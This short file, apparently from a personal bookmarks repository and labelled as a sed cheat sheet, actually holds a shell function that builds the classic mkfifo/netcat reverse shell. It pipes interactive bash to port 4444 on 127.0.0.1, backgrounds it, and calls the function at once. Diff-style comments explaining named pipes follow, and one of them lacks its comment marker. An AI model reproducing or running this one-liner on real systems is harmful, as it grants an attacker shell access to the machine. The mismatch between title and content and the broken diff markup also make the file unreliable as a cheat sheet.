efxtv/EFX-Tv-Bookmarks/bin/cheat_sheet/sed_cheat_sheet.md

 ```
 exps(){
 rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 127.0.0.1 4444 > /tmp/f &
+# What is mkfifo
+# First In, First Out
+#
+In a Linux directory listing, the letter p in the file permissions indicates that the file is a named pipe,
+# which is created using the mkfifo command.
+# Named pipes are also referred to as FIFOs (First In, First Out) and are a form of interprocess communication.
+# or
+# mkfifo is a command in Linux used to create a special type of file called a FIFO (First In, First Out).
+# A FIFO is also known as a named pipe, and it provides a mechanism for interprocess communication (IPC) between two processes.
 }
 exps
 ```